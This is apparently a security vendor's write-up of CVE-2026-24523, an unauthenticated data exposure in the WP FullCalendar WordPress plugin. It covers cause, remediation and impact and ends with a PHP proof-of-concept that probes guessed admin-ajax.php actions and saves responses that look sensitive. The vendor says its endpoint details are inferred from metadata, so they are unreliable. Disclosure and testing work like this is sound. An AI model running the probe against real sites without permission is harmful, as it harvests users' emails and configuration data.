Atomic Edge analysis of CVE-2026-24523 (metadata-based):
This vulnerability is an unauthenticated information exposure flaw in the WP FullCalendar WordPress plugin, affecting all versions up to and including 1.6. The flaw allows attackers without credentials to extract sensitive user or configuration data. The CVSS score of 5.3 (Medium) reflects a network-based attack with low complexity and no user interaction required, leading to confidentiality loss.
Atomic Edge research indicates the root cause is likely an AJAX endpoint or REST API route registered by the plugin that lacks proper capability checks. The CWE-200 classification confirms sensitive data is exposed to unauthorized actors. Without a code diff, this conclusion is inferred from the vulnerability description and common WordPress plugin patterns. The endpoint likely queries the WordPress database for user or site configuration data but omits an `is_user_logged_in()` check or a proper `current_user_can()` capability validation.
Exploitation involves sending a crafted HTTP request to a specific WordPress AJAX handler. The attacker targets `/wp-admin/admin-ajax.php` with a POST or GET request containing an `action` parameter that triggers the vulnerable plugin function. Based on the plugin slug, a likely action parameter is `wpfc_ajax` or a derivative like `wpfc_get_events`. The attacker sends this request without authentication cookies or a valid nonce. The server responds with sensitive data, which may include user emails, names, or site configuration details stored in the plugin’s settings.
Remediation requires the plugin developer to implement proper authorization checks on all data-fetching endpoints. The fix must verify the requesting user has appropriate permissions, typically by adding a capability check like `if ( ! current_user_can( ‘manage_options’ ) ) wp_die();` before any data retrieval. For endpoints intended to be public, the data output must be strictly sanitized to remove sensitive fields. A nonce check, while beneficial for CSRF protection, does not address the core authorization flaw present in this vulnerability.
The impact of successful exploitation is the disclosure of sensitive information. Attackers can harvest user data (emails, display names) or internal configuration details. This data can facilitate social engineering, targeted phishing campaigns, or inform further attacks against the site. While the vulnerability does not permit direct modification or code execution, the exposed information represents a significant privacy violation and security risk.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-24523 - FullCalendar <= 1.6 - Unauthenticated Information Exposure
<?php
/**
* Proof of Concept for CVE-2026-24523.
* This script attempts to exploit an unauthenticated information disclosure
* in the WP FullCalendar plugin (<= v1.6).
* Assumptions: The vulnerable endpoint is an AJAX handler. The action parameter
* is inferred from common plugin patterns. The response may contain JSON or HTML.
*/
$target_url = 'https://example.com/wp-admin/admin-ajax.php'; // CHANGE THIS
// Common AJAX action hooks for the 'wp-fullcalendar' plugin
$potential_actions = [
'wpfc_ajax',
'wpfc_get_events',
'wpfc_fullcalendar',
'fullcalendar_ajax'
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
foreach ($potential_actions as $action) {
echo "[*] Testing action: {$action}n";
// Use POST method (common for AJAX). Some endpoints may accept GET.
$post_data = ['action' => $action];
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($http_code == 200 && !empty($response)) {
// Check if response contains potentially sensitive data patterns
if (preg_match('/email|user|admin|config|setting|option/i', $response)) {
echo "[!] POTENTIAL SUCCESS with action: {$action}n";
echo "[!] Response preview (first 500 chars): " . substr($response, 0, 500) . "nn";
// Optionally, save full response to a file for analysis
file_put_contents('cve_2026_24523_response_' . $action . '.txt', $response);
} else {
echo "[+] Received 200 response, but no obvious sensitive data patterns.n";
echo "[+] Response: " . substr($response, 0, 200) . "nn";
}
} else {
echo "[-] Request failed or returned HTTP {$http_code}nn";
}
}
curl_close($ch);
echo "[+] PoC scan complete.n";
?>
